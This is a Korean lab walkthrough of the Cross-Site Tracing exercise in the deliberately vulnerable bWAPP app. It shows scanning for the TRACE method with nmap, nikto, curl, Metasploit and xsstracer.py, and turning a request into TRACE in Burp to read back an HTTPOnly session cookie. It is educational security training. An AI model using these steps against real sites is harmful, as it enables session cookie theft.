정보보안(구버전)/ bWAPP 2019. 2. 16. 13:12

웹 해킹 bWAPP - 66. A5 - Security Misconfiguration - Cross-Site Tracing(XST)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Security Misconfiguration

 

 - 잘못된 보안 구성
 - 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
 - Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,

         특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일


 

 

2. HTTP TRACE 메소드

 

 - 웹 서버에게 전송한 요청 메세지의 복사본을 받기 위한 메소드이다.

 - 보통 테스트 용도로 사용하지만, 복사본 내용 안에는 사용자 쿠키 정보도 포함되어 있기 때문에 XST 공격에 취약하다.

 

 

 

3. XST(Cross-Site Tracing)

 

 - HTTPOnly 플래그가 설정되어 있으면, XSS 공격에 의한 쿠키 정보 탈취를 방어할 수 있다.

 - 그러나 TRACE 메소드를 이용하면 HTTPOnly 기능을 우회하여 쿠키 정보를 획득할 수 있는 취약점이 있다.

 

 

 

4. Security Misconfiguration - Cross-Site Tracing(XST)

 

 - 이 시나리오는 TRACE 메소드를 이용하여 사용자 요청에 대한 쿠기 정보를 획득하는 내용이다.

 

 

Ex1) Security Misconfiguration - Cross-Site Tracing(XST) 이해

 

 

보안 레벨 선택 및 시나리오 선택

 

 

HTTPOnly 플래그가 설정되어 있어도 HTTP TRACE 메소드를 이용하여 쿠키 정보 획득이 가능하다는 내용 확인

 

 

 

nmap을 이용하여 TRACE 메소드 사용 유무 스캔 실시

root@kali:~# nmap 192.168.20.205 --script http-methods --script-args http-method.test-all='/192.168.20.205'

 

Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-03 15:26 KST
Nmap scan report for www.bwapphttpslow.com (192.168.20.205)
Host is up (0.000048s latency).
Not shown: 984 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
139/tcp  open  netbios-ssn
443/tcp  open  https
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
666/tcp  open  doom
3306/tcp open  mysql
5901/tcp open  vnc-1
6001/tcp open  X11:1
8080/tcp open  http-proxy
| http-methods:
|_  Supported Methods: GET HEAD
8443/tcp open  https-alt
| http-methods:
|_  Supported Methods: GET HEAD
9080/tcp open  glrpc
MAC Address: 00:0C:29:5B:24:81 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
root@kali:~#

 

 

 

nikto을 이용하여 TRACE 메소드 사용 유무 스캔 실시

root@kali:~# nikto -h 192.168.20.205
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.20.205
+ Target Hostname:    192.168.20.205
+ Target Port:        80
+ Start Time:         2019-03-03 15:24:30 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
~ 중간 생략 ~


+ mod_ssl/2.2.8 OpenSSL/0.9.8g - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

~ 중간 생략 ~


root@kali:~#

 

 

 

curl을 이용하여 TRACE 메소드 사용 유무 스캔 실시

root@kali:~# curl -v -X OPTIONS 192.168.20.205


* Rebuilt URL to: 192.168.20.205/
*   Trying 192.168.20.205...
* TCP_NODELAY set
* Connected to 192.168.20.205 (192.168.20.205) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.20.205
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 03 Mar 2019 06:27:41 GMT
< Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 0
< Content-Type: text/html
< X-Pad: avoid browser bug
<
* Connection #0 to host 192.168.20.205 left intact
 

 

 

 

메타스플로잇을 이용하여 TRACE 메소드 사용 유무 스캔 실시

root@kali:~# msfconsole -q
 
msf > use auxiliary/scanner/http/options


msf auxiliary(scanner/http/options) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/http/options) > set rport 80
rport => 80


msf auxiliary(scanner/http/options) > exploit

 

[+] 192.168.20.205 allows GET,HEAD,POST,OPTIONS,TRACE methods
[+] 192.168.20.205:80 - TRACE method allowed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

msf auxiliary(scanner/http/options) >
msf auxiliary(scanner/http/options) > use auxiliary/scanner/http/trace
msf auxiliary(scanner/http/trace) >
msf auxiliary(scanner/http/trace) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/http/trace) > set rport 80
rport => 80


msf auxiliary(scanner/http/trace) > exploit

 

[+] 192.168.20.205:80 is vulnerable to Cross-Site Tracing
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/trace) >
msf auxiliary(scanner/http/trace) > quit


root@kali:~#

 

 

 

Intercept -> 'Intercept is on' 으로 변경 실시

 

 

 

주소창 새로 고침 클릭

 

 

 

버프슈트 Intercept 내용 확인

 

 

 

GET 메소드를 TRACE 메소드로 변경 실시

GET /bWAPP/sm_xst.php HTTP/1.1  <- 기존 내용

 

TRACE /bWAPP/sm_xst.php HTTP/1.1  <- 변경 내용

 

Host: 192.168.20.205

User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.205/bWAPP/xss_stored_2.php

Cookie: PHPSESSID=4123975b1f94e0999503343be60a2595; security_level=0

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0 

 

 

 

TRACE 메소드 변경 확인 -> 'Forward' 버튼 클릭

 

 

 

'Intercept is on'를 클릭하여 off 실시

 

 

 

'Intercept is off' 확인

 

 

 

bWAPP -> '파일 저장' 선택 -> '확인' 버튼 클릭

 

 

 

'sm_xst.php' 파일 내용 확인 -> 쿠키 정보 확인

root@kali:~# cd Downloads/
root@kali:~/Downloads# ls -l sm_xst.php
-rw-r--r-- 1 root root 541  3월  3 15:46 sm_xst.php
root@kali:~/Downloads#
root@kali:~/Downloads# cat sm_xst.php
TRACE /bWAPP/sm_xst.php HTTP/1.1
Host: 192.168.20.205
User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.205/bWAPP/xss_stored_2.php
Cookie: PHPSESSID=4123975b1f94e0999503343be60a2595; security_level=0
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

 

root@kali:~/Downloads# cd
root@kali:~#

 

 

 

66-0. 'xsstracer.py' 다운로드 주소.txt

'xsstracer.py'을 이용한 XST 취약점 테스트

root@kali:~# wget https://raw.githubusercontent.com/1N3/XSSTracer/master/xsstracer.py


--2019-03-03 16:56:26--  https://raw.githubusercontent.com/1N3/XSSTracer/master/xsstracer.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.72.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.72.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4600 (4.5K) [text/plain]
Saving to: ‘xsstracer.py’

xsstracer.py        100%[===================>]   4.49K  --.-KB/s    in 0s     

2019-03-03 16:56:26 (16.2 MB/s) - ‘xsstracer.py’ saved [4600/4600]


root@kali:~# ls -l xsstracer.py
-rw-r--r-- 1 root root 4600  3월  3 16:56 xsstracer.py

root@kali:~# python xsstracer.py 192.168.20.205 80

 

 __  ______ _____
 \ \/ / ___|_   _|
  \  /\___ \ | | 
  /  \ ___) || | 
 /_/\_|____/ |_| 

 

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: 192.168.20.205:80
+ -- --=[Site vulnerable to Cross-Site Tracing!
+ -- --=[Site vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

 

HTTP/1.1 200 OK
Date: Sun, 03 Mar 2019 07:56:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Transfer-Encoding: chunked
Content-Type: message/http

 

4c
TRACE / HTTP/1.1
Test: <script>alert(1);</script>
Host: 192.168.20.205


0


HTTP/1.1 200 OK
Date: Sun, 03 Mar 2019 07:56:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Sun, 02 Nov 2014 18:20:24 GMT
ETag: "ccb16-24c-506e4489b4a00"
Accept-Ranges: bytes
Content-Length: 588
Content-Type: text/html

 

<!DOCTYPE html>
<html>

 

<body>

 

<h1>bWAPP, an extremely buggy web app !</h1>

 <table>

  <tr height="20">
  <td>
  <a href="bWAPP">bWAPP</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="drupal">Drupageddon</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="evil">Evil folder</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="phpmyadmin">phpMyAdmin</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="sqlite">SQLiteManager</a>
  </td>
  </tr>

  <tr height="200">
  <td>
  <img src="./bWAPP/images/evil_bee.png">
  </td>
  </tr>

 </table>

</body>

</html>

 

root@kali:~#

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 66. A5 - bWAPP Security Misconfiguration - Cross-Site Tracing(XST)   https://youtu.be/CHTDubIkUHU

저작자표시 비영리 변경금지

'정보보안(구버전) > bWAPP' 카테고리의 다른 글

웹 해킹 bWAPP - 68. A5 - Security Misconfiguration - Denial-of-Service(Slow HTTP DoS)  (0) 2019.02.16
웹 해킹 bWAPP - 67. A5 - Security Misconfiguration - Denial-of-Service (Large Chunk Size)  (0) 2019.02.16
웹 해킹 bWAPP - 65. A5 - Security Misconfiguration - Cross-Origin Resource Sharing(AJAX)  (0) 2019.02.16
웹 해킹 bWAPP - 64. A5 - Security Misconfiguration - Cross-Domain Policy File(Flash)  (0) 2019.02.15
웹 해킹 bWAPP - 63. A5 - Security Misconfiguration - Arbitrary File Access(Samba)  (0) 2019.02.15
Posted by 김정우 강사(카카오톡 : kim10322)
,

티스토리툴바

Q